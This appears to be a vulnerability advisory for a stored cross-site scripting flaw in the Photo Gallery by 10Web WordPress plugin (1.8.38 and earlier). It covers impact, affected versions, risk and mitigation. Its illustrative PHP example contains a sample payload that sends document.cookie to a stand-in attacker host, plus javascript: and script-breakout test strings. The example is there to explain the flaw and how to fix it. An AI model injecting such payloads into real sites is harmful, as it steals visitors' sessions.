Impact
The vulnerability is a stored Cross-Site Scripting (XSS) flaw in the Photo Gallery by 10Web plugin for WordPress. Input supplied through the gallery management interface is saved and later written into the public gallery page without proper output escaping, so an attacker can inject arbitrary HTML and JavaScript that is served to every user who views the gallery. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and carries a CVSS score of 5.9. An attacker able to store the payload gains client-side script execution in the context of the site for each victim, which can be used to steal or ride on user sessions or to deface gallery content, but gives no direct control over the server itself.
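To make the mechanism concrete, the following PHP snippet is an added, schematic example written for this page; it is not code from the 10Web plugin and does not reproduce its actual vulnerable function. It assumes a hypothetical gallery-title field stored by an authenticated user and a hypothetical rendering function, and ships minimal stand-ins for the WordPress escaping helpers so it runs outside WordPress. It contrasts unescaped output (the bug class described above) with context-appropriate escaping at the point of output.

```php
<?php
// Added illustrative example, not code from Photo Gallery by 10Web.
// Field, function and class names are hypothetical.

// Constructed sample payload: what a user with gallery-editing rights might
// save as a gallery title. The onerror handler fires because src=x never loads.
$stored_gallery_title =
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable rendering: the stored value is concatenated straight into HTML,
// so the browser parses the payload as markup and runs the handler for every
// visitor who views the gallery page.
function render_title_vulnerable($title) {
    return '<h2 class="gallery-title">' . $title . '</h2>';
}

// Hardened rendering: escape when writing output, with the WordPress helper
// that matches the context (HTML body text here). The same bytes are stored;
// they are simply rendered as inert text instead of being parsed as markup.
function render_title_fixed($title) {
    return '<h2 class="gallery-title">' . esc_html($title) . '</h2>';
}

// Attribute values need esc_attr() and URLs need esc_url(); using the escaper
// for the wrong context (e.g. esc_html() on a javascript: URL) is itself a
// common cause of XSS. Here esc_url() drops the javascript: scheme entirely
// and esc_attr() neutralises the quote-breakout in the alt text.
function render_thumb_fixed($url, $alt) {
    return '<img src="' . esc_url($url) . '" alt="' . esc_attr($alt) . '">';
}

// Minimal stand-ins so this file runs outside WordPress. Inside a plugin the
// real esc_html()/esc_attr()/esc_url() from wp-includes/formatting.php apply.
if (!function_exists('esc_html')) {
    function esc_html($s) {
        return htmlspecialchars((string) $s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
    function esc_attr($s) {
        return htmlspecialchars((string) $s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
    function esc_url($s) {
        $s = trim((string) $s);
        // Allow only http(s) and site-relative URLs; reject javascript:, data:, etc.
        if ($s !== '' && !preg_match('#^(https?://|/)#i', $s)) {
            return '';
        }
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable path: the <img ... onerror=...> tag reaches the visitor's browser intact.
echo render_title_vulnerable($stored_gallery_title), "\n";
// Fixed path: the same payload is emitted as escaped text and cannot execute.
echo render_title_fixed($stored_gallery_title), "\n";
// Attribute/URL contexts: scheme filtered, quotes encoded.
echo render_thumb_fixed('javascript:alert(1)', '"><script>alert(1)</script>'), "\n";
```

Run it with the PHP CLI (`php example.php`) and compare the three lines: only the first contains an unescaped `<img` tag with an `onerror` attribute. The design point is that stored XSS is fixed at output, not by trying to sanitise on save; the database may legitimately hold angle brackets, and each rendering context (text, attribute, URL) needs its own escaper.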
Affected Systems
Any WordPress installation running the Photo Gallery by 10Web plugin at version 1.8.38 or earlier is affected; the flaw is present in all releases up to and including 1.8.38. Confirm the installed version from the WordPress Plugins screen or a WP-CLI plugin listing before deciding whether a site is exposed.
Risk and Exploitability
The CVSS score of 5.9 puts the severity at Medium, while the EPSS score places the probability of exploitation in the wild very low (below 1%). The vulnerability is not listed in the CISA KEV catalog. The expected attack path is the gallery management interface: an attacker who already holds an account with sufficient privileges (an administrator, or a user with gallery-creation or editing rights) saves a malicious script into a gallery field. Once stored, the script runs in the site's origin inside the browser of every user who views the affected gallery page. From there it can read the page DOM and any cookies not flagged HttpOnly, and it can issue requests that carry the victim's WordPress session, so an administrator viewing the gallery can be made to perform privileged actions on their own behalf; it has no direct access to the underlying server. The low exploitation likelihood reflects the prerequisite of authenticated access to the WordPress backend or gallery management interface. Mitigation is to update the plugin to a release later than 1.8.38; until then, limit gallery-editing rights to trusted accounts and review existing gallery fields for unexpected HTML.
OpenCVE Enrichment